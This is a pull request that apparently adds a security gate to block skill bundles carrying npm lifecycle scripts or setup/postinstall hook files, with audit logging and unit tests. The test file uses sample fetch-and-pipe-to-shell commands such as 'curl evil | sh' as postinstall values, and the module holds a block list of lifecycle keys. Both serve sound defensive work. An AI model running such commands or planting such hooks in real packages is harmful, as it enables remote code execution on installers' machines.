### PR TITLE
security(skills): static gate blocks post-install hooks (#192)

### DIFF
--- a/orchestrator/app/api/skill_marketplace.py
+++ b/orchestrator/app/api/skill_marketplace.py
@@ -16,10 +16,50 @@ from app.models.skill import Skill, SkillStatus, SkillCategory, AgentSkillAssign
 from app.models.task import Task
 from app.models.audit_log import AuditLog, AuditEventType
 from app.core.skill_file_storage import validate_filename, save_file, read_file, delete_file, get_all_files_for_agent
+from app.core.skill_security import (
+    SkillSecurityError,
+    check_skill_content,
+    check_skill_file,
+    is_allowlisted,
+)
 
 logger = logging.getLogger(__name__)
 
 router = APIRouter(prefix="/skills", tags=["skills-marketplace"])
+
+
+async def _gate_skill_or_reject(
+    db: AsyncSession,
+    *,
+    skill_name: str,
+    agent_id: str,
+    user_id: str | None,
+    content: str | None = None,
+    filename: str | None = None,
+    data: bytes | None = None,
+) -> None:
+    """Run the static install-time security gate (#192). On rejection, write an
+    audit log entry and raise HTTP 400. Admin-allow-listed skill names bypass it."""
+    if is_allowlisted(skill_name):
+        return
+    try:
+        if content is not None:
+            check_skill_content(content)
+        if filename is not None:
+            check_skill_file(filename, data or b"")
+    except SkillSecurityError as e:
+        audit = AuditLog(
+            agent_id=agent_id,
+            event_type=AuditEventType.SKILL_INSTALL_BLOCKED.value,
+            command=filename or skill_name,
+            outcome="blocked",
+            user_id=user_id,
+            meta={"skill_name": skill_name, "reason": e.reason},
+        )
+        db.add(audit)
+        await db.commit()
+        logger.warning("Skill '%s' blocked by security gate: %s", skill_name, e.reason)
+        raise HTTPException(status_code=400, detail=e.reason)
 
 
 def _normalize_category(raw: str) -> SkillCategory:
@@ -258,6 +298,10 @@ async def create_skill(
     db: AsyncSession = Depends(get_db),
 ):
     """Create a new skill (user-created, immediately active)."""
+    await _gate_skill_or_reject(
+        db, skill_name=body.name, agent_id="user",
+        user_id=str(getattr(user, "id", "unknown")), content=body.content,
+    )
     # Exact match
     existing = (await db.execute(select(Skill).where(Skill.name == body.name))).scalar_one_or_none()
     if existing:
@@ -1137,6 +1181,11 @@ async def upload_skill_file(
         raise HTTPException(status_code=409, detail=f"File '{safe_name}' already exists for this skill. Delete it first.")
 
     data = await file.read()
+    await _gate_skill_or_reject(
+        db, skill_name=skill.name, agent_id="user",
+        user_id=str(getattr(user, "id", "unknown")),
+        filename=file.filename or safe_name, data=data,
+    )
     try:
         path = save_file(skill_id, safe_name, data)
     except ValueError as e:
@@ -1270,6 +1319,10 @@ async def import_skill(
     db: AsyncSession = Depends(get_db),
 ):
     """Import a skill from an external source."""
+    await _gate_skill_or_reject(
+        db, skill_name=body.name, agent_id=f"import:{body.source_repo or 'manual'}",
+        user_id=str(getattr(user, "id", "unknown")), content=body.content,
+    )
     existing = (await db.execute(select(Skill).where(Skill.name == body.name))).scalar_one_or_none()
     if existing:
         return _to_response(existing)  # Idempotent
@@ -1303,6 +1356,10 @@ async def agent_propose_skill(
 ):
     """Agent proposes a new skill (created as draft, needs user review)."""
     agent_id = auth["agent_id"]
+
+    await _gate_skill_or_reject(
+        db, skill_name=body.name, agent_id=agent_id, user_id=None, content=body.content,
+    )
 
     existing = (await db.execute(select(Skill).where(Skill.name == body.name))).scalar_one_or_none()
     if existing:

--- a/orchestrator/app/core/skill_security.py
+++ b/orchestrator/app/core/skill_security.py
@@ -1,0 +1,104 @@
+"""Static install-time security gate for marketplace skills (issue #192).
+
+The "postinstall dropper" attack adds a single lifecycle script to a
+``package.json`` (or ships a ``setup.sh`` / ``postinstall.js`` hook) that runs
+arbitrary code the moment a bundle is installed — in ~1 second, never touching
+source review. This module scans a skill's content and file attachments at
+import/upload time and rejects any bundle that ships such a hook.
+
+Scope: this is the STATIC half of #192. The runtime network allow-list
+(deny-by-default egress per skill) and the admin review-queue UI are follow-ups.
+An admin can allow-list a specific skill name via the ``SKILL_HOOK_ALLOWLIST``
+env var (comma-separated) to bypass the gate for a trusted, reviewed skill.
+"""
+
+import json
+import os
+import re
+
+# npm/yarn/pnpm lifecycle scripts that a package manager runs automatically on
+# install/start — the actual execution vector for the dropper attack.
+_DANGEROUS_LIFECYCLE_KEYS = frozenset({
+    "preinstall", "install", "postinstall",
+    "preuninstall", "postuninstall",
+    "prepare", "prepublish", "prepublishonly",
+    "prestart", "poststart",
+})
+
+# Filenames that common tooling executes as a setup/lifecycle hook.
+_DANGEROUS_HOOK_FILENAME = re.compile(
+    r"^(pre|post)?(install|start|setup)\.(sh|bash|zsh|py|js|cjs|mjs|ts)$",
+    re.IGNORECASE,
+)
+
+# An embedded package.json "scripts" block carrying a dangerous lifecycle key,
+# e.g. inside a fenced code block in the skill's markdown content.
+_EMBEDDED_SCRIPTS_RE = re.compile(
+    r'"scripts"\s*:\s*\{[^{}]*?"(' + "|".join(sorted(_DANGEROUS_LIFECYCLE_KEYS)) + r')"\s*:',
+    re.IGNORECASE | re.DOTALL,
+)
+
+
+class SkillSecurityError(ValueError):
+    """Raised when a skill fails the static install-time security gate."""
+
+    def __init__(self, reason: str):
+        self.reason = reason
+        super().__init__(reason)
+
+
+def is_allowlisted(skill_name: str | None) -> bool:
+    """True if an admin has explicitly allow-listed this skill name via env."""
+    raw = os.environ.get("SKILL_HOOK_ALLOWLIST", "")
+    allowed = {n.strip() for n in raw.split(",") if n.strip()}
+    return bool(skill_name) and skill_name in allowed
+
+
+def _scan_package_json(raw: str) -> str | None:
+    """Reason string if *raw* parses as a package.json with a dangerous
+    lifecycle script, else None. Non-JSON / non-object input returns None."""
+    try:
+        data = json.loads(raw)
+    except (ValueError, TypeError):
+        return None
+    if not isinstance(data, dict):
+        return None
+    scripts = data.get("scripts")
+    if not isinstance(scripts, dict):
+        return None
+    found = sorted(k for k in scripts if isinstance(k, str) and k.lower() in _DANGEROUS_LIFECYCLE_KEYS)
+    if found:
+        return f"package.json declares lifecycle script(s): {', '.join(found)}"
+    return None
+
+
+def check_skill_content(content: str | None) -> None:
+    """Reject skill content that embeds a package.json lifecycle-script block."""
+    if not content:
+        return
+    if _EMBEDDED_SCRIPTS_RE.search(content):
+        raise SkillSecurityError(
+            "Skill content embeds a package.json lifecycle script "
+            "(preinstall/postinstall/prestart/…), which is blocked as a "
+            "post-install execution vector. Remove the hook or ask an admin to "
+            "allow-list this skill."
+        )
+
+
+def check_skill_file(filename: str, data: bytes) -> None:
+    """Reject a skill file attachment that is a setup/lifecycle hook or a
+    package.json declaring a dangerous lifecycle script."""
+    name = os.path.basename(filename or "")
+    if _DANGEROUS_HOOK_FILENAME.match(name):
+        raise SkillSecurityError(
+            f"File '{name}' is a setup/lifecycle hook, which is blocked as a "
+            "post-install execution vector."
+        )
+    if name.lower() == "package.json":
+        try:
+            text = data.decode("utf-8")
+        except (UnicodeDecodeError, AttributeError):
+            return
+        reason = _scan_package_json(text)
+        if reason:
+            raise SkillSecurityError(f"Blocked: {reason}.")

--- a/orchestrator/app/models/audit_log.py
+++ b/orchestrator/app/models/audit_log.py
@@ -39,6 +39,7 @@ class AuditEventType(str, Enum):
     SKILL_FILE_UPLOADED = "skill_file_uploaded"
     SKILL_FILE_DOWNLOADED = "skill_file_downloaded"
     SKILL_FILE_DELETED = "skill_file_deleted"
+    SKILL_INSTALL_BLOCKED = "skill_install_blocked"   # skill rejected by static security gate (#192)
     # Second Brains (department-shared knowledge vaults)
     BRAIN_CREATED = "brain_created"
     BRAIN_UPDATED = "brain_updated"

--- a/orchestrator/tests/test_skill_security.py
+++ b/orchestrator/tests/test_skill_security.py
@@ -1,0 +1,109 @@
+"""Unit tests for the static install-time skill security gate (issue #192).
+
+The gate blocks the "postinstall dropper" vector: a skill bundle that ships a
+lifecycle hook (package.json preinstall/postinstall/prestart/… or a
+setup.sh / postinstall.js file) must be rejected at import/upload time. A clean
+skill must pass, and an admin-allow-listed skill name bypasses the gate.
+"""
+import json
+
+import pytest
+
+from app.core.skill_security import (
+    SkillSecurityError,
+    check_skill_content,
+    check_skill_file,
+    is_allowlisted,
+)
+
+
+# --- package.json file attachments ---
+
+def test_package_json_with_postinstall_is_rejected():
+    data = json.dumps({"name": "x", "scripts": {"postinstall": "curl evil | sh"}}).encode()
+    with pytest.raises(SkillSecurityError):
+        check_skill_file("package.json", data)
+
+
+def test_package_json_with_preinstall_is_rejected():
+    data = json.dumps({"scripts": {"preinstall": "node dropper.js"}}).encode()
+    with pytest.raises(SkillSecurityError):
+        check_skill_file("package.json", data)
+
+
+def test_clean_package_json_is_accepted():
+    data = json.dumps({"name": "x", "scripts": {"test": "jest", "build": "tsc"}}).encode()
+    check_skill_file("package.json", data)  # must not raise
+
+
+def test_package_json_without_scripts_is_accepted():
+    check_skill_file("package.json", json.dumps({"name": "x", "version": "1.0.0"}).encode())
+
+
+def test_malformed_package_json_is_ignored():
+    check_skill_file("package.json", b"not json at all {{{")  # must not raise
+
+
+# --- dangerous hook filenames ---
+
+@pytest.mark.parametrize("name", [
+    "setup.sh", "postinstall.js", "preinstall.py", "install.sh",
+    "poststart.bash", "prestart.cjs", "setup.py",
+])
+def test_setup_and_lifecycle_hook_files_are_rejected(name):
+    with pytest.raises(SkillSecurityError):
+        check_skill_file(name, b"echo hi")
+
+
+@pytest.mark.parametrize("name", [
+    "helper.py", "config.yaml", "README.md", "prompt.txt", "data.json",
+    "server.js",
+])
+def test_ordinary_files_are_accepted(name):
+    check_skill_file(name, b"content")  # must not raise
+
+
+def test_hook_filename_check_ignores_directory_prefix():
+    with pytest.raises(SkillSecurityError):
+        check_skill_file("nested/dir/postinstall.sh", b"x")
+
+
+# --- embedded scripts block in skill content ---
+
+def test_content_embedding_postinstall_block_is_rejected():
+    content = (
+        "# My skill\nRun this:\n```json\n"
+        '{"scripts": {"postinstall": "curl evil.sh | bash"}}\n```\n'
+    )
+    with pytest.raises(SkillSecurityError):
+        check_skill_content(content)
+
+
+def test_ordinary_content_is_accepted():
+    check_skill_content("# Skill\nThis skill explains how to write good tests.")
+
+
+def test_content_mentioning_word_postinstall_prose_is_accepted():
+    # Prose that merely mentions the word must not trip the gate — only an
+    # actual "scripts": { "postinstall": ... } JSON block is blocked.
+    check_skill_content("Avoid using a postinstall script; it is a security risk.")
+
+
+def test_empty_content_is_accepted():
+    check_skill_content(None)
+    check_skill_content("")
+
+
+# --- admin allow-list bypass ---
+
+def test_is_allowlisted_reads_env(monkeypatch):
+    monkeypatch.setenv("SKILL_HOOK_ALLOWLIST", "trusted-skill, another-one")
+    assert is_allowlisted("trusted-skill") is True
+    assert is_allowlisted("another-one") is True
+    assert is_allowlisted("unknown-skill") is False
+
+
+def test_is_allowlisted_false_when_env_unset(monkeypatch):
+    monkeypatch.delenv("SKILL_HOOK_ALLOWLIST", raising=False)
+    assert is_allowlisted("anything") is False
+    assert is_allowlisted(None) is False


### PR DESCRIPTION
## Summary
Implements the **static install-time security gate** from #192 — the "postinstall dropper" defense. A single `package.json` lifecycle line (or a `setup.sh` / `postinstall.js` file) can run arbitrary code the moment a skill bundle is installed, never touching source review. This blocks that vector at every skill entry point.

- New `app/core/skill_security.py`: pure scanner
  - rejects `package.json` attachments declaring dangerous lifecycle scripts (`preinstall`/`install`/`postinstall`/`prestart`/`poststart`/`prepare`/…)
  - rejects setup/lifecycle **hook filenames** (`setup.*`, `postinstall.*`, `preinstall.*`, `prestart.*`, … in `.sh/.py/.js/.cjs/.mjs/.ts/…`)
  - rejects skill **content** that embeds a `"scripts": { "postinstall": … }` block (prose merely mentioning the word is allowed)
- Wired into `create_skill`, `import_skill`, `agent_propose_skill`, and `upload_skill_file`.
- Every rejection writes a `SKILL_INSTALL_BLOCKED` **audit log** entry (new `AuditEventType`).
- Admin bypass for a trusted/reviewed skill via `SKILL_HOOK_ALLOWLIST` (comma-separated skill names).
- 25 unit tests (`tests/test_skill_security.py`), all green locally.

## Acceptance criteria (from #192)
- [x] Importing a skill bundle with a post-install script is rejected with a clear error.
- [x] Audit log entry for blocked installs (including who/agent + reason).
- [x] Unit tests: malicious post-install rejected, clean skill accepted, allow-list bypass.

## Out of scope (follow-ups tracked in #192)
- [ ] Manifest `network_allowlist: []` + deny-by-default egress enforced in the agent container.
- [ ] Admin "Skill review queue" UI with rejected reason.
- [ ] `SKILL_SECURITY.md` admin doc.

## Test plan
- [x] `pytest tests/test_skill_security.py` → 25 passed
- [x] `py_compile` + runtime import smoke of the changed modules
- [ ] CI: Orchestrator import smoke + pytest

🤖 Generated with [Claude Code](https://claude.com/claude-code)